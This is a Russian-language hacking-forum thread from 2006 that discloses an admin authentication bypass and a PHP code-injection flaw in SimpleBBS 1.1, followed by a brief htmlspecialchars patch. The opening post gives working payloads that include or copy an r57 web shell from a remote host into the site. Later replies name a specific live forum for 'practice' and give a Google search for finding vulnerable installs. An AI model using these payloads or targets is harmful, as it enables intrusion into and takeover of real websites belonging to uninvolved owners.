Форумы SimpleBBS 1.1 PHP code execution

Discussion in 'Уязвимости CMS/форумов' started by _Great_, 30 Dec 2006.

  1. _Great_

    _Great_ Elder - Старейшина

    Joined:
    27 Dec 2005
    Messages:
    2,032
    Likes Received:
    1,119
    Reputations:
    1,139
    Продукт: SimpleBBS 1.1
    Уязвимость: Выполнение произвольного PHP-кода
    Опасность: Критическая

    Описание
    Выполнение PHP кода найдено в скрипте администрирования форума SimpleBBS.
    В параметре "Title font" в панели администратора можно ввести php-код в виде:
    Code:
    phpinfo();die;/*
    который будет выполнен при прямом обращении к скрипту data/options.php
    Чтобы получить доступ к панели администрирования достаточно установить cookie с именем SbbCookie и значением - ником администратора. Ник администратора можно получить со страницы пользователей.
    Для получения шелла потребуется код:
    Code:
    include($_GET[c]);die;/*
    Обращаться - data/options.php?c=http://www.site.com/r57shell.txt
    или
    Code:
    copy($_GET[a],$_GET[ b]);die;/*
    Обращаться - data/options.php?a=http://www.site.com/r57shell.txt&b=topics.php и шелл будет скопирован в topics.php.

    Защита
    Предлагается фильтровать параметр ylarivifont следующим кодом.
    includes/adminjee3.php
    Было:
    PHP:
    $tallennus = fopen("data/options.php", "w");
    flock ($tallennus,2);
    fwrite($tallennus, "<?php
    // TITLE FONT, FONTSIZE, FONTCOLOR, BGCOLOR
    $ylarivifont
    Заменить на:
    PHP:
    $tallennus = fopen("data/options.php", "w");
    flock ($tallennus,2);
    $ylarivifont = htmlspecialchars($ylarivifont);
    fwrite($tallennus, "<?php
    // TITLE FONT, FONTSIZE, FONTCOLOR, BGCOLOR
    $ylarivifont
    Author: Great
     
    3 people like this.
  2. Samson

    Samson Elder - Старейшина

    Joined:
    14 Dec 2006
    Messages:
    55
    Likes Received:
    52
    Reputations:
    25
    Гугл выдал - SimpleBBS is a free flat-file based bulletin board. It is very easy to install and use, and there are no useless features so even first timers can learn to ...
    если есть пароль к админке на бюлетене, это будет работать? или может, ЭТО, другие вкусности на бюлетене позволяет?

    С НОВЫМ 2007! =)
     
  3. _Great_

    _Great_ Elder - Старейшина

    Joined:
    27 Dec 2005
    Messages:
    2,032
    Likes Received:
    1,119
    Reputations:
    1,139
    Пароль к админке не нужен. Я описал две баги - вход в админку без пароля и выполнение в админке произвольного кода.
    если есть пасс, первая бага не нужна. сразу заходи в админку
     
    1 person likes this.
  4. Samson

    Samson Elder - Старейшина

    Joined:
    14 Dec 2006
    Messages:
    55
    Likes Received:
    52
    Reputations:
    25
  5. Zitt

    Zitt Elder - Старейшина

    Joined:
    7 May 2006
    Messages:
    736
    Likes Received:
    268
    Reputations:
    59
    Вот тут мона потренировацца
    http://asukkaat.hoas.fi/tukkitie/forum/index.php
     
  6. _Great_

    _Great_ Elder - Старейшина

    Joined:
    27 Dec 2005
    Messages:
    2,032
    Likes Received:
    1,119
    Reputations:
    1,139
    _http://www.google.ru/search?q=%22Powered+by+SimpleBBS+v1.1%22
     
    1 person likes this.
  7. Abra

    Abra Member

    Joined:
    17 Sep 2005
    Messages:
    278
    Likes Received:
    51
    Reputations:
    29
    зашел на офф сайт
    .....